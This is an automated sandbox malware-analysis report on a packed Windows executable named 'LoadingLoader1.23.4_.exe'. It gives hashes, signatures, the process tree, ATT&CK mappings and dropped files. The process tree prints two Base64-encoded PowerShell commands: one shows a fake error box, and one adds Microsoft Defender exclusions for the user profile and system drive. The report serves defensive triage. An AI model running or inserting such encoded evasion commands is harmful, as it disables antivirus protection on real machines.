a5919a19c11aad0d5952563ac07b653bb3b44e887b4614d64d5f29d1cc2ea274

General

Target

LoadingLoader1.23.4_.exe
Size

117.7MB
MD5

e9b978b3e9771add83cdbf69e8319d46
SHA1

b4813634d987ed20807a24c1feb0bb01913f34fd
SHA256

a5919a19c11aad0d5952563ac07b653bb3b44e887b4614d64d5f29d1cc2ea274
SHA512

ef69e12da23f529e3b4e33a175cc8baef0541aece4c43245e5e41ab99967cc0d4c267e85fc5326a69ce4d9f1fda00f5f0c65056335e6ad5adc74390fa8186552
SSDEEP

3145728:T3lAti03/gG5uyw3REfQmgE3XfXX4r6Wa2keVTBRdX9VoS3ftQSYG:ByiidMywhEfQHEn/c82PTTTN3ftQSYG

Score

7^/10

execution pyinstaller upx

Malware Config

Signatures

Executes dropped EXE 5 IoCs

Processes:

main.exemain.exeAlsoMain.exeAlsoMain.exe

pid process

2968 main.exe
2904 main.exe
2772 AlsoMain.exe
2084 AlsoMain.exe
1248
Loads dropped DLL 7 IoCs

Processes:

LoadingLoader1.23.4_.exemain.exemain.exeAlsoMain.exe

pid process

1492 LoadingLoader1.23.4_.exe
2968 main.exe
2904 main.exe
1492 LoadingLoader1.23.4_.exe
2084 AlsoMain.exe
1248
1248

pid	process
2968	main.exe
2904	main.exe
2772	AlsoMain.exe
2084	AlsoMain.exe
1248

pid	process
1492	LoadingLoader1.23.4_.exe
2968	main.exe
2904	main.exe
1492	LoadingLoader1.23.4_.exe
2084	AlsoMain.exe
1248
1248

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\_MEI29682\python311.dll	upx
behavioral1/memory/2904-29-0x000007FEF5C20000-0x000007FEF6212000-memory.dmp	upx
behavioral1/memory/2084-1300-0x000007FEF5620000-0x000007FEF5C12000-memory.dmp	upx

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

2100 powershell.exe
2412 powershell.exe

pid	process
2100	powershell.exe
2412	powershell.exe

Detects Pyinstaller 1 IoCs

pyinstaller

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\main.exe	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

2412 powershell.exe
2100 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2412 powershell.exe
Token: SeDebugPrivilege 2100 powershell.exe

pid	process
2412	powershell.exe
2100	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2412	powershell.exe
Token: SeDebugPrivilege	2100	powershell.exe

Suspicious use of WriteProcessMemory 22 IoCs

Processes:

LoadingLoader1.23.4_.exemain.exeAlsoMain.exe

description	pid	process	target process
PID 1492 wrote to memory of 2100	1492	LoadingLoader1.23.4_.exe	powershell.exe
PID 1492 wrote to memory of 2100	1492	LoadingLoader1.23.4_.exe	powershell.exe
PID 1492 wrote to memory of 2100	1492	LoadingLoader1.23.4_.exe	powershell.exe
PID 1492 wrote to memory of 2100	1492	LoadingLoader1.23.4_.exe	powershell.exe
PID 1492 wrote to memory of 2412	1492	LoadingLoader1.23.4_.exe	powershell.exe
PID 1492 wrote to memory of 2412	1492	LoadingLoader1.23.4_.exe	powershell.exe
PID 1492 wrote to memory of 2412	1492	LoadingLoader1.23.4_.exe	powershell.exe
PID 1492 wrote to memory of 2412	1492	LoadingLoader1.23.4_.exe	powershell.exe
PID 1492 wrote to memory of 2968	1492	LoadingLoader1.23.4_.exe	main.exe
PID 1492 wrote to memory of 2968	1492	LoadingLoader1.23.4_.exe	main.exe
PID 1492 wrote to memory of 2968	1492	LoadingLoader1.23.4_.exe	main.exe
PID 1492 wrote to memory of 2968	1492	LoadingLoader1.23.4_.exe	main.exe
PID 2968 wrote to memory of 2904	2968	main.exe	main.exe
PID 2968 wrote to memory of 2904	2968	main.exe	main.exe
PID 2968 wrote to memory of 2904	2968	main.exe	main.exe
PID 1492 wrote to memory of 2772	1492	LoadingLoader1.23.4_.exe	AlsoMain.exe
PID 1492 wrote to memory of 2772	1492	LoadingLoader1.23.4_.exe	AlsoMain.exe
PID 1492 wrote to memory of 2772	1492	LoadingLoader1.23.4_.exe	AlsoMain.exe
PID 1492 wrote to memory of 2772	1492	LoadingLoader1.23.4_.exe	AlsoMain.exe
PID 2772 wrote to memory of 2084	2772	AlsoMain.exe	AlsoMain.exe
PID 2772 wrote to memory of 2084	2772	AlsoMain.exe	AlsoMain.exe
PID 2772 wrote to memory of 2084	2772	AlsoMain.exe	AlsoMain.exe

C:\Users\Admin\AppData\Local\Temp\LoadingLoader1.23.4_.exe
"C:\Users\Admin\AppData\Local\Temp\LoadingLoader1.23.4_.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1492
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAegBoACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHcAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcARgBhAHQAYQBsACAARQByAHIAbwByACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwBzAHgAeAAjAD4A"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2100
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAcAB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGEAbQBjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAcQBlACMAPgA="
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2412
- C:\Users\Admin\AppData\Local\Temp\main.exe
  "C:\Users\Admin\AppData\Local\Temp\main.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2968
- - C:\Users\Admin\AppData\Local\Temp\main.exe
    "C:\Users\Admin\AppData\Local\Temp\main.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2904
- C:\Users\Admin\AppData\Local\AlsoMain.exe
  "C:\Users\Admin\AppData\Local\AlsoMain.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2772
- - C:\Users\Admin\AppData\Local\AlsoMain.exe
    "C:\Users\Admin\AppData\Local\AlsoMain.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2084

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\_MEI29682\python311.dll

Filesize
1.6MB

MD5
ccdbd8027f165575a66245f8e9d140de

SHA1
d91786422ce1f1ad35c528d1c4cd28b753a81550

SHA256
503cd34daed4f6d320731b368bbd940dbac1ff7003321a47d81d81d199cca971

SHA512
870b54e4468db682b669887aeef1ffe496f3f69b219bda2405ac502d2dcd67b6542db6190ea6774abf1db5a7db429ce8f6d2fc5e88363569f15cf4df78da2311

Download Submit
C:\Users\Admin\AppData\Local\Temp\main.exe

Filesize
37.0MB

MD5
98f99bd18d325ae773a5f909c59cb29b

SHA1
fd61ca0fb47256a460614c7df7c49525f2fb9b83

SHA256
f008fc42b6e39a70450a65afa800a4df002374f4b3f0def4df9fd7a804976d73

SHA512
8031f6cb749de649fae7344d91c1c665d83646a7a63afc162b3d6b729111bb692760c7120769970dc1108d33b4bf53b30ceb5cecabec318655d063736bea00ba

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
d0a7a52b562c4a5f08ba746a6c1d7311

SHA1
3fb99ce8219d5a3e27fb52d75316c1f9c1261a86

SHA256
cc7c685e172ebcfbb691377825e907b7dc1717913d9fe23047e3420a390f51c3

SHA512
d40f4e4fa7610754427f0c8b7412dfecd93de0f90a6d31dc272ebd7d387ea87a534e377d361c7c0d18939f6de7fdfd8849b47006599e7f8fc328a544a685dbc6

Download Submit
memory/2084-1300-0x000007FEF5620000-0x000007FEF5C12000-memory.dmp

Filesize
5.9MB

Download
memory/2904-29-0x000007FEF5C20000-0x000007FEF6212000-memory.dmp

Filesize
5.9MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads